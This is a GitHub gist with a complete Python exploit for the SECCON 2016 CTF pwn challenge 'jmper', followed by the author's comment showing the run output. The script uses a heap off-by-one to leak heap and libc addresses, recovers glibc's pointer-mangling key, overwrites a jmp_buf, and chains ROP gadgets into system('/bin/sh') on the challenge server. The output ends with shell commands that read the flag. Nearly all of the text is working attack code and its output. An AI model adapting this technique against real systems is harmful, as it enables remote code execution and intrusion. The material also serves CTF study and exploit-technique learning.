Skip to content

Instantly share code, notes, and snippets.

@otms61

otms61/jmper.py

Created December 10, 2016 15:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save otms61/12dc8ca5f5863e88652ffa979ef9aea7 to your computer and use it in GitHub Desktop.
Save otms61/12dc8ca5f5863e88652ffa979ef9aea7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
jmper.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
from time import sleep
def sock(remoteip, remoteport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remoteip, remoteport))
f = s.makefile('rw', bufsize=0)
return s, f
def read_until(f, delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
# print data
return data
def p(a):
return struct.pack("<Q", a)
def u(a):
return struct.unpack("<Q", a)[0]
def shell(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
# s, f = sock('localhost', 4444)
s, f = sock('jmper.pwn.seccon.jp', 5656)
read_until(f, '6. Bye :)\n')
def ADD_STUDENT():
print '[+] Add student!'
f.write('1\n')
read_until(f, '6. Bye :)\n')
def NAME(sid, name):
assert len(name) <= 0x22
print '[+] Write Name: sid:{}, Name:{}'.format(sid, name)
f.write('2\n')
f.write('{}\n'.format(sid))
f.write(name)
read_until(f, '6. Bye :)\n')
print '[-] Writed.'
def WRITE_MEMO(sid, memo):
assert len(memo) <= 0x22
print '[+] Write Memo: sid:{}, Memo: {}'.format(sid, memo)
f.write('3\n')
f.write('{}\n'.format(sid))
f.write(memo)
read_until(f, '6. Bye :)\n')
print '[-] done Memo.'
def SHOW_NAME(sid):
f.write('4\n')
read_until(f, 'ID:')
f.write('{}\n'.format(sid))
print '[+] ID: {}\'s NAME'.format(sid)
name = read_until(f, '1.')[:-2]
print name
read_until(f, '6. Bye :)\n')
return name
def SHOW_MEMO(sid):
f.write('5\n')
read_until(f, 'ID:')
f.write('{}\n'.format(sid))
print '[+] ID: {}\'s MEMO'.format(sid)
memo = read_until(f, '1.')[:-2]
print memo
read_until(f, '6. Bye :)\n')
return memo
# libc_puts_offset = 0x6f690
# libc_system_offset = 0x45390
libc_puts_offset = 0x06fd60
libc_system_offset = 0x046590
puts_got = 0x601fa0
ADD_STUDENT()
ADD_STUDENT()
ADD_STUDENT()
WRITE_MEMO(0, '0'*0x20 + chr(0x78) + '\n')
WRITE_MEMO(1, '0'*0x20 + chr(0x08) + '\n')
heap2_offset = 0x278
heap2_addr = u(SHOW_NAME(1).ljust(8, '\x00'))
heap_base = heap2_addr - heap2_offset
print 'heap2 addr: {:#x}'.format(heap2_addr)
print 'heap base addr: {:#x}'.format(heap_base)
jmp_buf_offset = 0x110
jmp_buf = heap_base + 0x110
xored_stack_addr = jmp_buf + 0x30
xored_jmp_addr = jmp_buf + 0x38
xor_a = 0x400c31
NAME(0, p(puts_got) + '\n')
libc_puts = u(SHOW_NAME(1).ljust(8, '\x00'))
libc_base = libc_puts - libc_puts_offset
libc_system = libc_base + libc_system_offset
print 'puts addr: {:#x}'.format(libc_puts)
print 'libc base: {:#x}'.format(libc_base)
print 'system addr: {:#x}'.format(libc_system)
# 0x00400cc3: pop rdi ; ret ; (1 found)
popret = 0x00400cc3
data_addr = 0x602000
NAME(0, p(data_addr) + '\n')
NAME(1, '/bin/sh' + '\n')
print '/bin/sh addr: {:#x}'.format(data_addr)
rop_addr = 0x602f00
NAME(0, p(rop_addr) + '\n')
NAME(1, p(data_addr) + '\n')
NAME(0, p(rop_addr+8) + '\n')
NAME(1, p(libc_system) + '\n')
print 'set rop gadget'
def lol(x):
pos = bin(x)[2:].rjust(64, '0')[:17]
pre = bin(x)[2:].rjust(64, '0')[17:]
return int(pre+pos, 2)
def ror(x):
pos = bin(x)[2:].rjust(64, '0')[:-17]
pre = bin(x)[2:].rjust(64, '0')[-17:]
return int(pre+pos, 2)
NAME(0, p(xored_jmp_addr) + '\n')
print 'set xored_jmp_addr'
print 'xored jmp addr: {:#x}'.format(xored_jmp_addr)
hoge = SHOW_NAME(1)
xored_jmp = u(hoge[:8].ljust(8, '\x00'))
print 'get xored_jmp_addr value'
xor_key = ror(xored_jmp) ^ xor_a
target_addr = popret
xored_target_addr = lol(target_addr ^ xor_key)
xored_rop_addr = lol(rop_addr ^ xor_key)
print 'xored jmp addr: {:#x}'.format(xored_jmp_addr)
print 'xored jmp: {:#x}'.format(xored_jmp)
print 'xored key: {:#x}'.format(xor_key)
print 'target addr: {:#x}'.format(target_addr)
print 'xored target addr: {:#x}'.format(xored_target_addr)
print 'rop stack addr: {:#x}'.format(rop_addr)
print 'xored rop stack addr: {:#x}'.format(xored_rop_addr)
NAME(1, p(xored_target_addr) + '\n')
NAME(0, p(xored_stack_addr) + '\n')
NAME(1, p(xored_rop_addr) + '\n')
for _ in range(27):
ADD_STUDENT()
f.write('1\n')
shell(s)
@otms61
Copy link
Author

otms61 commented Dec 10, 2016 

python jmper.py
[+] Add student!
[+] Add student!
[+] Add student!
[+] Write Memo: sid:0, Memo: 00000000000000000000000000000000x

[-] done Memo.
[+] Write Memo: sid:1, Memo: 00000000000000000000000000000000

[-] done Memo.
[+] ID: 1's NAME
xR.
heap2 addr: 0x22e5278
heap base addr: 0x22e5000
[+] Write Name: sid:0, Name:�`

[-] Writed.
[+] ID: 1's NAME
`�F��
puts addr: 0x7fd246129d60
libc base: 0x7fd2460ba000
system addr: 0x7fd246100590
[+] Write Name: sid:0, Name: `

[-] Writed.
[+] Write Name: sid:1, Name:/bin/sh

[-] Writed.
/bin/sh addr: 0x602000
[+] Write Name: sid:0, Name:/`

[-] Writed.
[+] Write Name: sid:1, Name: `

[-] Writed.
[+] Write Name: sid:0, Name/`

[-] Writed.
[+] Write Name: sid:1, Name:�F��

[-] Writed.
set rop gadget
[+] Write Name: sid:0, Name:HQ.

[-] Writed.
set xored_jmp_addr
xored jmp addr: 0x22e5148
[+] ID: 1's NAME
��z
get xored_jmp_addr value
xored jmp addr: 0x22e5148
xored jmp: 0x7a13930ef21b1e9b
xored key: 0x8f4dbd09c9c7753c
target addr: 0x400cc3
xored target addr: 0x7a13930ef3ff1e9b
rop stack addr: 0x602f00
xored rop stack addr: 0x7a13934eb4791e9b
[+] Write Name: sid:1, Name:����z

[-] Writed.
[+] Write Name: sid:0, Name:@Q.

[-] Writed.
[+] Write Name: sid:1, Name:�y�N�z

[-] Writed.
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
Exception has occurred. Jump!
ls
flag
jmper
cat flag
SECCON{3nj0y_my_jmp1n9_serv1ce}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment